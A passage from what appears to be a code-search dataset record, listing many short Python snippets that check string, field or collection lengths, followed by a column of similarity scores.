0:\n return \"No Leds in Group\"", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def len23(self, len): # -> None:\n ...", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def __len__(self):\n return len(self.raw)", "def length(value):\n\n # Try to return the length\n return len(value)", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def check_length(length):\n if length > lengthLimit:\n 
err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def check_bag_size(self):\r\n return len(self.db.tilestring)", "def remaining_cards(self):\n\n return str(len(self.hand))", "def test_deck_has_52_cards(self):\n self.assertEqual(len(cardutils.Deck().deck), 52)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def __len__(self) -> int:\n return len(self.length)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def _requiredLength(self):\n if self.partner is not None:\n if self.partner.level == self.level:\n return len(self.partner)\n elif self.partner.level < self.level:\n return 1\n elif self._value is not None:\n return 1\n else:\n return 0", "def __len__(self):\r\n return 4", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def __len__(self):\n return len(self._canaux)", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def test_field_length_matches_data_type_field_length(self):\n for known_message_type in KNOWN_MESSAGE_TYPES:\n for field in known_message_type.fields:\n if self.is_verbose:\n print 'Checking length setup of field {0} in message {1}'.format(field.name, known_message_type.name)\n self.assertEqual(field.length, field.data_type.length)", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def test_candidatesubr_len(self):\n\n self.assertEqual(len(self.cand_subr), 3)", "def Length(self) -> int:", "def Length(self) -> int:", "def __len__():", "def __len__():", "def __len__():", "def __len__(self):\n return self._length # pylint: disable = E1101", "def __len__(self):\n\n return len(self.data) * 8", "def length(self):\n ...", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def len_unpadded(self) -> int:", "def __len__(self) -> int:\n return 3", "def reallength(value):\n try:\n value.count()\n except:\n return len(value)", "def __len__(self) -> int:\n return len(self.value)", "def __len__(self):\n\n return self.length", "def __len__(self) -> int:\n return self.length", "def num_cards(self):\n length=len(self.cards)\n return length", "def __len__(self):\n return self.cli.passwords.len()", "def __len__(self):\n\t\treturn 3", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def length(self):\n pass", "def __len__(self):\n\t\treturn 8", "def __len__(self) -> int:\n return len(self.getvalue())", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def test_len(self):\n self.assertEqual(len(self.tester), 21)", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' 
* 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def __len__(self):\n return 30", "def check_embed(embed: Embed) -> bool:\n if len(embed) <= 6000:\n if hasattr(embed, \"title\"):\n if len(embed.title) <= 256:\n pass\n else:\n return False\n if len(embed.fields) <= 25:\n for field in embed.fields:\n if len(field.name) <= 69420:\n pass", "def __len__(self):\n # TODO: Is this method used?\n return self._info['length']", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def length(self) -> int:\n pass", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def testLen(self):\n self.assertEquals(7, len(Color))", "def __len__(self):\n return 19", "def get_length(self):\r\n return len(self.hand)", "def source_data_key_length_check(source_data_key, algorithm):\n if len(source_data_key.data_key) != algorithm.kdf_input_len:\n raise InvalidDataKeyError(\n \"Invalid Source Data Key length {actual} for algorithm required: {required}\".format(\n actual=len(source_data_key.data_key), required=algorithm.kdf_input_len\n )\n )", "def test_len(self):\n self.assertEqual(len(self.tester), 30)", "def test_prep_charfield_size(self):\n pass", "def check_string_length(string):\n if len(string) > 255:\n sys.exit(\"ERROR: Max permitted string length is 255\")", "def __len__(self):\n return self.__length", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def check_len(password_length, alphabet_length, numb_length, symb_length):\r\n return (symb_length + alphabet_length + numb_length) == password_length", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def test_check_name_is_3_parts():\n check_name_length()", "def __len__(self) -> int:", "def __len__(self) -> int:", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def strlen(val): \n return len(val)", "def __length_hint__(self) -> 'Literal[28]':\n return 28", "def test_size():\n assert Packet106.size == 12" ]
[ "0.6684012", "0.64644367", "0.6452459", "0.6451033", "0.63982964", "0.6384937", "0.63768864", "0.63765895", "0.6351771", "0.6343237", "0.6343237", "0.6326682", "0.6316303", "0.62818766", "0.6273519", "0.6246097", "0.62296754", "0.62225854", "0.6151962", "0.61194175", "0.61119974", "0.6102316", "0.6030081", "0.6021634", "0.6005019", "0.59823304", "0.5954278", "0.5940963", "0.592178", "0.5916094", "0.5911423", "0.5911423", "0.5876943", "0.5842814", "0.5840498", "0.58372486", "0.5836066", "0.5832264", "0.5831336", "0.5823213", "0.5823174", "0.5823174", "0.5823174", "0.5823174", "0.5823174", "0.5823174", "0.5821509", "0.5804241", "0.57965857", "0.5793077", "0.5793077", "0.5790851", "0.5790851", "0.5790851", "0.5784896", "0.577884", "0.576828", "0.57630855", "0.57628006", "0.57524556", "0.5739808", "0.5736544", "0.5727635", "0.57273257", "0.5723598", "0.57222426", "0.5716714", "0.57166964", "0.57121617", "0.57121015", "0.5711378", "0.57078063", "0.5702311", "0.56941116", "0.56933767", "0.5688865", "0.568592", "0.5684701", "0.56758964", "0.56736773", "0.56720144", "0.56720144", "0.56720144", "0.56674296", "0.56662625", "0.5664701", "0.5658655", "0.5657769", "0.5647096", "0.5641308", "0.5639461", "0.56392515", "0.5638561", "0.563708", "0.56355596", "0.5633046", "0.5633046", "0.56329936", "0.5630994", "0.56293714", "0.56287557" ]
0.0
-1
Check length of CardHolder field (len = 29)
def test_31(self): assert 'True' == Api.requestBlock('test-31')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def max_length(verifield, required):\n if verifield is None: return True\n return len(verifield) <= required", "def check_len( string_key ) : \r\n\r\n if len( string_key ) != 4 :\r\n\r\n raise Eggog( \"'%s': EGI wants the key to be exactly four characters!\" % (string_key, ) ) \r\n \r\n else :\r\n \r\n return True", "def get_length(self):\n return len(self.cards)", "def len12(self, len): # -> None:\n ...", "def checkLength(ish, length):\n if ish == \"Visa\":\n ok = (13,16)\n elif ish == \"American Express\":\n ok = (15,)\n elif ish == \"MasterCard\":\n ok = (16,)\n elif ish == \"Discover/Novus\":\n ok = (16,)\n else:\n raise TypeError, \"unknown issuer\"\n return length in ok", "def checkPacketLength(self):\n return self.packetLength == len(self) - PRIMARY_HEADER_BYTE_SIZE - 1", "def __len__(self):\n return len(self.cards)", "def test_shared_cards_len(self):\n self.assertEqual(len(self.hand.sharedCards), 3)", "def __len__(self):\n return len(self._cards)", "def __len__(self):\n return len(self._cards)", "def verify_length(src_json):\n error: str = \"\"\n if len(src_json.get(\"LedGroups\", [])) == 0:\n error = \"No or empty LedGroups\"\n if len(src_json.get(\"Sequencers\", [])) == 0:\n error = \"No or empty Sequencers\"\n return error", "def LengthTest(arr):\n\tif len(arr) == 8:\n\t\treturn True;\n\telif len(arr) == 7:\n\t\treturn IsMissingField('cid', arr)\n\telse:\n\t\treturn False", "def test_partial_deck_has_fewer_cards(self):\n self.assertEqual(len(self.partialDeck.deck), 46)", "def verify_length(src_json: Dict[str, List[str]]):\n if len(src_json.get(\"Leds\", [])) == 0:\n return \"No Leds in Group\"", "def __len__(self):\n return len(self._cards)", "def get_length(self):\r\n return len(self.deck)", "def min_length(verifield, required):\n if verifield is None: return True\n return len(verifield) >= required", "def __len__( self ):\n \n return len(self.__deck)", "def test_length(self):\n form_data = self.form_data('c897B$eH@')\n form = self.form(data=form_data, user=self.u)\n self.assertFalse(form.is_valid())", "def test_maxlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'license_plate': 'AF8934'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': '123456'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF893'}\n self.assertTrue(val.validate(document))\n\n document = {'license_plate': 'AF8-934'}\n self.assertFalse(val.validate(document))\n\n document = {'license_plate': 'AF 934'}\n self.assertFalse(val.validate(document))", "def test_lengths(self):\n self.assertEqual(size(attempt.Z), 201)\n self.assertEqual(size(attempt.W), 201)", "def len23(self, len): # -> None:\n ...", "def __len__(self):\n return len(self.raw)", "def _check_field_length(self, field, value, options=None):\n options = options if options else field.GetOptions()\n for (option, setting) in options.ListFields():\n if option.name == \"length\":\n if self.__gt_by_type(value, setting):\n if hasattr(field, \"name\"):\n raise FieldTooLongException(\"The field '\" + field.name +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")\n else:\n raise FieldTooLongException(\"List element '\" + str(value) +\n \"' is bigger than the allowed \" + str(setting) + \" bytes\")", "def length(value):\n\n # Try to return the length\n return len(value)", "def remaining_cards(self):\n\n return str(len(self.hand))", "def check_bag_size(self):\r\n return len(self.db.tilestring)", "def 
check_length(length):\n if length > lengthLimit:\n err_str = \"The length value (%s) is higher than the \" % (length)\n err_str += \"limit length (%s)\" % (lengthLimit)\n raise ValueError(err_str)", "def test_rfc_nickkey_length(s):\n assert len(util.rfc_nickkey(s)) == len(s)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_len(self):\n self.assertEqual(len(self.tester), 27)", "def test_deck_has_52_cards(self):\n self.assertEqual(len(cardutils.Deck().deck), 52)", "def __len__(self):\r\n return 4", "def test_get_shortuuid_specific_length(self):\n id = get_shortuuid(length=10)\n self.assertTrue(len(id) == 10)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.CompoundingConversationDataset())) == 131569", "def __len__(self) -> int:\n return len(self.length)", "def test_field_length_matches_data_type_field_length(self):\n for known_message_type in KNOWN_MESSAGE_TYPES:\n for field in known_message_type.fields:\n if self.is_verbose:\n print 'Checking length setup of field {0} in message {1}'.format(field.name, known_message_type.name)\n self.assertEqual(field.length, field.data_type.length)", "def test_uid_max_length(self):\n\n field = self.image._meta.get_field(\"uid\")\n self.assertEqual(field.max_length, 64)", "def length(self):\n ...", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n return self.length", "def __len__(self):\n\n return len(self.data) * 8", "def Length(self) -> int:", "def Length(self) -> int:", "def __len__(self):\n return 19", "def format_length( self, key ) :\r\n\r\n return struct.calcsize( self[key] )", "def __len__(self):\n return 30", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[f\"POST /1234 HTTP/1.1\\r\\nHost: localhost\\r\\nX-Long: {'1' * 320}\\r\\n\\r\\n\"],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def __len__(self):\n return self._length # pylint: disable = E1101", "def __len__(self):\n\t\treturn 8", "def _validate_length(self, value):\n return (self.maximum_length is None) or (len(value) <= self.maximum_length)", "def length_of_name(self, name):\n length = len(name)\n if length > 10:\n self.show_message_when_name_very_long()\n return length", "def test_field_len(self):\n client = self.base_scenario(\n frang_config=\"http_field_len 300;\",\n requests=[self.post_request + [(\"header\", \"x\" * 320)]],\n )\n self.check_response(\n client,\n status_code=\"403\",\n warning_msg=\"frang: HTTP (in-progress )?field length exceeded for\",\n )", "def _matchLength(self, length: int):\n return self._comparator['Length'] < length", "def check_embed(embed: Embed) -> bool:\n if len(embed) <= 6000:\n if hasattr(embed, \"title\"):\n if len(embed.title) <= 256:\n pass\n else:\n return False\n if len(embed.fields) <= 25:\n for field in embed.fields:\n if len(field.name) <= 69420:\n pass", "def validVarConstructLength(self,varlen):\r\n if len(varlen)!=2:\r\n print 'variable must specify name and type'\r\n return False\r\n else:\r\n return True", "def __len__(self) -> int:\n return len(self.getvalue())", "def __len__():", "def __len__():", "def __len__():", "def __len__(self) -> int:\n return 3", "def __len__(self):\n return len(self._canaux)", "def __length_hint__(self) -> 'Literal[28]':\n return 
28", "def test_prep_charfield_size(self):\n pass", "def __len__(self):\n\n return self.length", "def _requiredLength(self):\n if self.partner is not None:\n if self.partner.level == self.level:\n return len(self.partner)\n elif self.partner.level < self.level:\n return 1\n elif self._value is not None:\n return 1\n else:\n return 0", "def length(self):\n pass", "def len_unpadded(self) -> int:", "def __len__(self):\n # TODO: Is this method used?\n return self._info['length']", "def __len__(self) -> int:\n return self.length", "def __len__(self):\n\t\treturn 3", "def mobile_len_validator(mobile):\n if len(mobile) != 13:\n raise ValidationError('Invalid mobile len')", "def num_cards(self):\n length=len(self.cards)\n return length", "def test_candidatesubr_len(self):\n\n self.assertEqual(len(self.cand_subr), 3)", "def __len__(self) -> int:\n return len(self.value)", "def reallength(value):\n try:\n value.count()\n except:\n return len(value)", "def test_size():\n assert Packet106.size == 12", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def __len__(self):\n return len(self.content)", "def get_length(self):\r\n return len(self.hand)", "def validate_length(column_name, value, length):\n valuelength = len(value)\n if valuelength > int(length) >= 0:\n return \"{0} : value '{1}' is greater than the specified length {2}\".format(column_name, value, length)\n elif valuelength < int(length) and int(length) >= 0:\n return \"{0} : value '{1}' is less than the specified length {2}\".format(column_name, value, length)\n\n return None", "def test_len(self):\n self.assertEqual(len(self.tester), 21)", "def length(self) -> int:\n pass", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def __len__(self):\n return self._length", "def __len__(self) -> int:\n return len(self.contents)", "def test_has_correct_length(self) -> None:\n assert len(list(ccc.ConversationDataset())) == 7168", "def __len__(self):\n return len(self.bytes)", "def test_client_ip_max_length(self):\n request = Request.objects.get(id=1)\n max_length = request._meta.get_field('client_ip').max_length\n self.assertEquals(max_length, 100)", "def invalid_caterpillar_length(length):\n try:\n length = int(length)\n except ValueError:\n return \"`caterpillar-length` must be something that can be cast to an `int`\"\n\n if not 1 <= length <= len(app.desk.indeces):\n return (\n \"`caterpillar-length` must be a number between \"\n f\"1 and {len(app.desk.indeces)}\"\n )\n\n return False", "def test_len(self):\n self.assertEqual(len(self.tester), 30)", "def getLength(self):\n return None", "def getLength(self):\n return None", "def test_length(self):\n for length in range(2, 30):\n self.assertEqual(len(generate_password(length)), length)", "def test_minlength(self):\n val = DwcaValidator(yaml.load(self.yaml_length, Loader=yaml.FullLoader),\n error_handler=WhipErrorHandler)\n document = {'postal_code': '9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': 'B-9050'}\n self.assertTrue(val.validate(document))\n\n document = {'postal_code': '905'}\n self.assertFalse(val.validate(document))" ]
[ "0.6592967", "0.6412684", "0.6403937", "0.64020187", "0.63984334", "0.6374663", "0.6358877", "0.6322181", "0.63155454", "0.63155454", "0.6293918", "0.62928987", "0.62740266", "0.6272036", "0.62385446", "0.6238426", "0.62309074", "0.6216641", "0.6173284", "0.6161911", "0.61607", "0.6151011", "0.6106857", "0.6018831", "0.5974027", "0.5961096", "0.59535277", "0.5922838", "0.5912662", "0.59034395", "0.59034395", "0.58716047", "0.5851824", "0.5841469", "0.5841197", "0.583395", "0.58220214", "0.5816099", "0.5812824", "0.58081996", "0.58081996", "0.58081996", "0.58081996", "0.58081996", "0.58081996", "0.5806492", "0.5787479", "0.5787479", "0.5779192", "0.5769492", "0.5765509", "0.57589036", "0.5758036", "0.57570946", "0.5750065", "0.5748494", "0.5744359", "0.57358986", "0.57339793", "0.5732642", "0.5732322", "0.5726195", "0.5726195", "0.5726195", "0.57239413", "0.5722867", "0.5719954", "0.57142913", "0.5710491", "0.57088923", "0.5707635", "0.57071805", "0.57066333", "0.5706312", "0.5701961", "0.5699623", "0.5697999", "0.56931686", "0.5685391", "0.5683254", "0.56741977", "0.5670851", "0.5670851", "0.5670851", "0.5667268", "0.5657991", "0.5645105", "0.56430984", "0.5642547", "0.5642547", "0.5642547", "0.5637633", "0.56366205", "0.5625004", "0.5620609", "0.5615839", "0.5613935", "0.56129503", "0.56129503", "0.56107974", "0.5609621" ]
0.0
-1
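`negatives` and `negative_scores` are parallel lists, so hard negatives can be selected per record by score. A hedged sketch follows; the `top_k` default is arbitrary, and the `float(...)` cast only covers the case where scores are stored as strings, as they appear in this preview:

```python
# Illustrative only: keep the highest-scoring (hardest) negatives of a record.
def hard_negatives(row, top_k=5):
    scored = sorted(
        zip((float(s) for s in row["negative_scores"]), row["negatives"]),
        key=lambda pair: pair[0],
        reverse=True,
    )
    return [snippet for _, snippet in scored[:top_k]]

# Usage: hard_negatives(ds[0]) returns the five most similar negative snippets.
```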
Send only spaces in CardHolder
def test_32(self): assert 'False' == Api.requestBlock('test-32')
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "async def spaced(self, ctx: DogbotContext, *, text: clean_content):\n await ctx.send(text.replace('', ' ').strip())", "def test_send_strips(connection, writer, loop):\n loop.run_until_complete(connection.connect())\n connection.send(\" a b c | @#$ d \")\n assert writer.used\n assert writer.has_written(\"a b c | @#$ d\\n\")", "def _hackBotchedCard(self, card, res):\n\t\tmat = re.match(r\"([^\\s=]*)\\s*=\\s*([^/]+)\", card.cardimage)\n\t\tif mat:\n\t\t\tres[mat.group(1)] = mat.group(2).strip()\n\t\telse: # Card beyond recognition, ignore\n\t\t\tpass", "def mecard(name, tel, email):\n return f'MECARD:N:{name};TEL:{tel};EMAIL:{email};'", "def sendingString(self):\n return ''", "def display_content(com,message):\n #message = message.encode('utf-8')\n #message = message.decode('ascii', 'ignore')\n safeMsg = filter(lambda x: x in string.printable, message)\n safeMsg = safeMsg.replace('\\n', ' ')\n print \"ALPHA: \", safeMsg\n try:\n #com = serial.Serial(config.devalpha, 9600, timeout=3)\n #com.close()\n #com.open()\n comstr = config.alpha['display'] + safeMsg + config.alpha['eot']\n com.write(comstr)\n #com.close()\n except serial.SerialException as e:\n logging.warning(\"Serial exception: \"+str(e))", "def get_space_bytes(self, bytes_):\n if self.state == 'S':\n # in space eating mode\n # control space needed?\n if bytes_.startswith(u' '):\n # replace by control space\n return u'\\\\ ', bytes_[1:]\n else:\n # insert space (it is eaten, but needed for separation)\n return u' ', bytes_\n else:\n return u'', bytes_", "def card(phenny, input):\n if not input.group(2):\n phenny.say(input.nick + 'Perhaps you meant \".card Storm Crow\"?')\n else:\n card_name = input.group(2).strip().lower().title()\n if card_name in nick.nicknames:\n card_name = nick.nicknames[card_name]\n card_text = get_card(card_name)\n if card_text:\n phenny.reply(card_text)\n else:\n phenny.reply(\"I could not find a card by that name.\")", "async def deliver_card(list_of_lists: List[List[str]]) -> str:\n\n final_string = []\n for sublist in list_of_lists:\n final_string.append('\\u200A'.join(sublist))\n\n # add blank emoji to first line to accommodate compact mode w/o resizing emojis\n return '<:blank:589560784485613570>\\n' + '\\n'.join(final_string)", "def propeller_card(card):\n return card.as_html()", "def white_spaces(value):\n if re.search(r'[\\s]', value):\n raise ValidationError(_('El login no puede contener espacios en blanco'))", "def fillBlanks(w_cards, b_card):\n b_card = b_card.replace('_', w_cards.replace('.', ''), 1)\n\n return b_card", "async def fivedollar(self, ctx):\n await ctx.message.edit(content=\"[̲̅$̲̅(̲̅5̲̅)̲̅$̲̅]\")", "def test_it_trims_whitespace(self):\n\n url = \"/integrations/add/\"\n form = {\"kind\": \"email\", \"value\": \" alice@example.org \"}\n\n self.client.login(username=\"alice@example.org\", password=\"password\")\n self.client.post(url, form)\n\n q = Channel.objects.filter(value=\"alice@example.org\")\n self.assertEqual(q.count(), 1)", "def get21_str(in_dict):\n return \"\"\"BEGIN:VCARD\nVERSION:2.1\nN;ENCODING=QUOTED-PRINTABLE;CHARSET=UTF-8:;%s;;;\nTEL;VOICE;CELL:%s\nEND:VCARD\n\"\"\"%(quopri.encodestring(in_dict[\"name\"]), in_dict[\"tel\"])", "def nettoie(txt):\n\ttxt = re.sub(\"\\s*$\",\"\",txt)\n\ttxt = re.sub(\"^\\s*\",\"\",txt)\n\treturn txt", "def squeeze(value):\r\n return re.sub(r\"[\\x00-\\x20]+\", \" \", value).strip()", "def preprocess_msg(self):\n self.tmp_msg = self.tmp_msg.lower()\n cleared = ''\n for ch in self.tmp_msg:\n if ch in string.ascii_lowercase:\n cleared += 
ch\n\n c = ''\n for ch in cleared:\n c += '{:02d}'.format(ord(ch) - 97)\n if len(c) % 4 != 0:\n c += '99'\n self.tmp_msg = c\n\n super().preprocess_msg()", "def card_factory(value: str, base: str, is_hidden: bool = False) -> str:\n if 1 <= len(value) <= 2:\n card = list(base)\n card[13:15] = f\"{value} \" if len(value) == 1 else f\"{value}\"\n card[74:76] = f\" {value}\" if len(value) == 1 else f\"{value}\"\n else:\n raise Exception(\"Invalid value lenght. Must be 1 or 2 charaters\")\n\n return hidden_face if is_hidden else \"\".join(card)", "def testCardStr(self):\n cardObj = Card('A','d')\n self.assertEquals('Ad',str(cardObj))", "def as_string(self):\n # Remove cards which have no definition\n cards = [card for card in self if card.definition is not None]\n # Remove cards which have no word\n cards = [card for card in cards if card.word]\n return \"\\n\".join([card.get_flashcard() for card in cards])", "def strip_space():\n pass", "def deal_card(self, player: BaseBlackjackPlayer, is_open: bool = True) -> str:\n card = self.deck.pick_card(discard=True, is_open=is_open)\n player.hand.cards.append(card)\n return f\"\\n{player.username} received {card}. Total is: {player.hand.value}\"", "def test_alnum(self, address):\n t=address.replace(\" \", \"\").isalnum()\n assert t, \"it only accept digits and letters\"", "def __card_display(self):\n return ''.join([(each_number if (i == 0 or i % 4 != 0) else ' ' + each_number)\n for i, each_number in enumerate(self.card_number)])", "def card_html_id(card):\n return f'c{card:02d}'", "def translate_deckbox_card_name(card_name: str) -> str:\n card_name = re.sub(r' \\(.*', '', card_name)\n card_name = re.sub(r'Æ', 'Ae', card_name)\n card_name = re.sub(r'Lim-Dûl\\'s Vault', 'Lim-Dul\\'s Vault', card_name)\n return card_name", "def message(self, text):\n\n if( rpi_device ):\n self.clear()\n for char in text:\n if char == '\\n' or char == '^':\n self.cmd(0xC0) # new line\n else:\n self.cmd(ord(char),True)", "def test_space_characters(client):\n response=client.post(\"/signin\",data=dict(email=' ', password=' '), content_type=\"multipart/form-data\")\n data=json.loads(response.data)\n assert response.status_code==401\n assert data[\"error\"] == \"email and password values can not be space characters\"", "def filter_chars(accepted_chars,target):\n while True:\n c = (yield)\n if c.lower() in accepted_chars:\n target.send(c.lower())", "def character(self):\n if self.is_alive():\n return \"[*]\"\n return \"[ ]\"", "def __str__(self):\n return self.card_no", "def manage_text(msg):\r\n msg = msg.upper()\r\n msg_final = \"\"\r\n for i in msg:\r\n if i.isalpha():\r\n msg_final += i\r\n return msg_final", "def _preprocess(self, sent: str) -> str:\n sent = sent.replace(\" \", \"▁\")\n return \" \".join([c for c in sent])", "def sn(self):\n\t\tstring = []\n\t\tresp = [0x00]\n\t\tself.spi.transfer([0x10], [0x00], 1)\n\t\ttime.sleep(9e-3)\n\t\tfor i in range(60):\n\t\t\tself.spi.transfer([0x00], resp, 1)\n\t\t\tstring.append(chr(resp[0]))\n\t\ttime.sleep(0.1)\n\t\treturn ''.join(string).strip()", "def do_cardid(self, line):\n if self.bootstrap() != 0:\n return self.return_code(1, True)\n\n key = self.card.get_pubkey()\n key_fmted = self.format_pubkey(key)\n\n print('\\nCard ID: %s' % key_fmted)\n return self.return_code(0)", "def test_is_str_rep_string(self):\n self.assertIsInstance(cardutils.Card(10,1).__str__(), str)", "def make_card_wish(self, symbol, player):\n if player == self.current_player:\n if symbol in \"s c h d\":\n self.wait_for_card_wish = False\n 
self.card_wished = symbol\n self.choose_next_player()\n return True\n return False", "def safe_number(self):\n mask = '*' * (len(self.card_number) - 4)\n return '{0}{1}'.format(mask, self.card_number[-4:])", "def gateway(arg):\n\tassert isinstance(arg, str)\n\treturn r\"(?P<%s>[\\w_\\-@\\' \\.]+)\" % (arg,)", "def __send(self) -> None:\n # region Docstring\n # endregion\n\n if len(self.entryline.get_text().strip()) > 0:\n self.udp.transmission(\n \"CHA\", \"01\", self.username, self.entryline.get_text().strip()\n )\n self.__addmsg(f\"<b>(YOU): </b><br>{self.entryline.get_text().strip()}<br>\")\n self.entryline.set_text(\"\")", "def produce_message_for_sending() -> str:\n return f\"You can donate your money here:\\n`{card_donations}`\"", "def clean_phone(self):\n data = self.cleaned_data['phone']\n data = data.strip(' +').replace('-', '')\n if len(data) == 12:\n data = data[3:]\n\n return data", "def remove_spaces(self, secret: str) -> str:\n\n secret_without_spaces = secret.replace(\" \", \"\")\n secret_without_spaces = re.sub(r\"\\W\", \"\", secret_without_spaces)\n return secret_without_spaces", "def _sendAndTrim(self, command, delim=None):\n assertTimeout = int (globalVar.assertTimeout)\n p = self.spawnProc\n p.sendline(command)\n a=p.readline()\n #print a\n\tif (not delim):\n\t prompt = self.prompt\n\telse:\n\t prompt = delim\n\n expList.append(prompt) \n \n result = p.expect(expList,assertTimeout)\n\n if (result != 2) :\n self._postCheck(result)\n # at this point, we have the output but also the command and\n # part of the prompt. get rid of the prompt chunk.\n if (not delim):\n\t promptChunk = self.promptChunk\n\telse:\n\t promptChunk = delim\n\n output = re.sub(promptChunk, '', p.before)\n output = re.sub(command+'\\r\\n', '', output)\n return output", "def space_between(self):\n self.spawn(\"./initials\").stdin(\"hailey James\", prompt=False).stdout(match(\"HJ\"), \"HJ\\n\").exit(0)", "def sendTcSpace(self, tcPacket):\n LOG_INFO(\"EDEN.Client.sendTcSpace\", \"EDEN\")\n tcSpacePDU = EGSE.EDENPDU.TCspace()\n tcSpacePDU.setCCSDSpacket(tcPacket)\n self.sendPDU(tcSpacePDU)", "def send_to_outputfield(self, message):\n\n try:\n # First strip characters outside of range\n # that cannot be handled by tkinter output field\n char_list = ''\n for x in range(len(message)):\n if ord(message[x]) in range(65536):\n char_list += message[x]\n message = char_list\n except Exception as e:\n logging.error(str(e))\n logging.exception(\"Exception : \")\n try:\n self.output.insert(END, message + \"\\n\")\n except Exception as e:\n logging.error(str(e))\n logging.exception(\"Exception : \")", "def test_sanitized_trim(self):\n value = \" sample \"\n response = clean.trim(value)\n assert response == \"sample\"\n assert type(response) == str", "def _spacer(self, msg):\n msg = str(msg)\n msg_len = len(msg)\n if msg_len == 1:\n print(\" \", end=\"\")\n elif msg_len == 2:\n print(\" \", end=\"\")", "def c_message(text):\n string = text\n string = string.replace('_', ' ')\n return \"C {}\".format(string)", "def preprocess_text(self):\n self.text_received = self.text_received.replace(\" \", \"\").lower()", "def absenden(self):\n\n message = self.textFeld.toPlainText()\n self.c.send(message)\n self.textFeld.clear()", "def send_msgs(self, submit_success):\n data = {}\n if submit_success:\n data['title'] = '[%s 同学] 打卡成功!' 
